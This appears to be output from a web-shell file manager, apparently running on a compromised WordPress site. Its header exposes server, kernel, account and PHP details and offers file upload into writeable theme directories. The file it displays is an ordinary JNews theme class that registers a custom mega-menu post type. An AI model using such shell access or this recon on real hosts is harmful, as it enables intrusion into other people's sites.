Server : LiteSpeed
System : Linux premium152.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : idesfsze ( 1473)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /home/idesfsze/pandaexpressketo.com/wp-content/themes/jnews/class/Menu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Current File : /home/idesfsze/pandaexpressketo.com/wp-content/themes/jnews/class/Menu/CustomMegaMenu.php
<?php
/**
 * Custom Mega menu
 *
 * @author : Jegtheme
 * @package jnews
 */

namespace JNews\Menu;

/**
 * Custom mega menu
 */
class CustomMegaMenu {

	/**
	 * Instance
	 *
	 * @var CustomMegaMenu
	 */
	private static $instance;

	/**
	 * Rendered
	 *
	 * @var bool
	 */
	private $rendered = false;

	/**
	 * Instance
	 *
	 * @return CustomMegaMenu
	 */
	public static function getInstance() {
		if ( null === static::$instance ) {
			static::$instance = new static();
		}
		return static::$instance;
	}

	/**
	 * Method __construct
	 *
	 * @return void
	 */
	public function __construct() {
		add_action( 'init', array( $this, 'custom_mega_menu_post_type' ) );
		add_action( 'jnews_main_menu', array( $this, 'mega_frontend_builder' ) );

		if ( ! is_admin() ) {
			add_action( 'init', array( $this, 'force_load_css' ), 1 );
		}

		add_filter( 'post_row_actions', array( $this, 'single_row_action' ), 10, 2 );
		add_filter( 'jeg_render_builder_content', array( $this, 'render_style' ), 10, 2 );
	}

	/**
	 * Method add_page_custom_css
	 *
	 * @param int $post_id $post_id.
	 *
	 * @return string
	 */
	public function add_page_custom_css( $post_id ) {
		$post_custom_css = get_post_meta( $post_id, '_wpb_post_custom_css', true );

		if ( ! empty( $post_custom_css ) ) {
			$post_custom_css = strip_tags( $post_custom_css );
			return '<style type="text/css" data-type="vc_custom-css">' . jnews_sanitize_by_pass( $post_custom_css ) . '</style>';
		}
	}

	/**
	 * Method custom_mega_menu_post_type
	 *
	 * @return void
	 */
	public function custom_mega_menu_post_type() {
		if ( ( is_admin() || jeg_is_frontend_vc() || jeg_is_frontend_elementor() ) && ! ( get_theme_mod( 'jnews_dashboard_custom_menu_disable', false ) && $this->is_user_role_excluded( get_current_user_id(), get_theme_mod( 'jnews_dashboard_custom_menu_user_roles' ) ) ) ) {
			jnews_register_post_type(
				'custom-mega-menu',
				array(
					'labels'          =>
						array(
							'name'               => esc_html__( 'Custom Mega Menu', 'jnews' ),
							'singular_name'      => esc_html__( 'Custom Mega Menu', 'jnews' ),
							'menu_name'          => esc_html__( 'Custom Menu', 'jnews' ),
							'add_new'            => esc_html__( 'New Mega Menu', 'jnews' ),
							'add_new_item'       => esc_html__( 'Build Custom Mega Menu', 'jnews' ),
							'edit_item'          => esc_html__( 'Edit Mega Menu', 'jnews' ),
							'new_item'           => esc_html__( 'New Mega Menu Entry', 'jnews' ),
							'view_item'          => esc_html__( 'View Custom Menu Template', 'jnews' ),
							'search_items'       => esc_html__( 'Search Custom Menu Template', 'jnews' ),
							'not_found'          => esc_html__( 'No entry found', 'jnews' ),
							'not_found_in_trash' => esc_html__( 'No Custom Menu in Trash', 'jnews' ),
							'parent_item_colon'  => '',
						),
					'description'     => esc_html__( 'Custom Mega Menu', 'jnews' ),
					'public'          => true,
					'show_ui'         => true,
					'menu_position'   => 8,
					'capability_type' => 'post',
					'hierarchical'    => false,
					'supports'        => array( 'title', 'editor' ),
					'map_meta_cap'    => true,
					'rewrite'         => array(
						'slug' => 'mega-menu',
					),
				)
			);
		}
	}

	/**
	 * Method force_load_css
	 *
	 * @return void
	 */
	public function force_load_css() {
		if ( get_option( 'load_vc_css_menu', false ) ) {
			add_filter( 'jnews_vc_force_load_style', '__return_true' );
		}
	}

	/**
	 * Method get_shortcode_custom_css
	 *
	 * @param int $post_id $post_id.
	 *
	 * @return string
	 */
	public function get_shortcode_custom_css( $post_id ) {
		$shortcodes_custom_css = get_post_meta( $post_id, '_wpb_shortcodes_custom_css', true );

		if ( ! empty( $shortcodes_custom_css ) ) {
			$shortcodes_custom_css = strip_tags( $shortcodes_custom_css );
			return '<style type="text/css" data-type="vc_shortcodes-custom-css">' . jnews_sanitize_by_pass( $shortcodes_custom_css ) . '</style>';
		}
	}

	/**
	 * Method is_user_role_excluded
	 *
	 * @param int   $user_id $user_id.
	 * @param array $option $option.
	 *
	 * @return boolean
	 */
	public function is_user_role_excluded( $user_id, $option ) {
		$user = get_user_by( 'id', $user_id );

		if ( empty( $user ) || ! $option ) {
			return false;
		}

		$roles = (array) $user->roles;

		if ( ! empty( $roles ) ) {
			foreach ( $roles as $role ) {
				if ( in_array( $role, $option, true ) ) {
					return true;
				}
			}
		}

		return false;
	}

	/**
	 * Method mega_frontend_builder
	 *
	 * @return void
	 */
	public function mega_frontend_builder() {
		if ( get_post_type() === 'custom-mega-menu' && ! $this->rendered ) {
			$this->rendered = true;
			echo "<div class='sub-menu custom-mega-menu force-show'>";
			the_post();
			the_content();
			echo '</div>';
		}
	}


	/**
	 * Method render_style
	 *
	 * @param string $output $output.
	 * @param int    $page_id $page_id.
	 *
	 * @return string
	 */
	public function render_style( $output, $page_id ) {
		if ( 'custom-mega-menu' === get_post_type( $page_id ) ) {
			$style  = $this->add_page_custom_css( $page_id );
			$style .= $this->get_shortcode_custom_css( $page_id );

			$output = $style . $output;
		}

		return $output;
	}

	/**
	 * Method single_row_action
	 *
	 * @param array  $actions $actions.
	 * @param object $post $post.
	 *
	 * @return array
	 */
	public function single_row_action( $actions, $post ) {
		if ( 'custom-mega-menu' === $post->post_type ) {
			unset( $actions['view'] );
			unset( $actions['inline hide-if-no-js'] );
		}

		return $actions;
	}
}

F1le Man4ger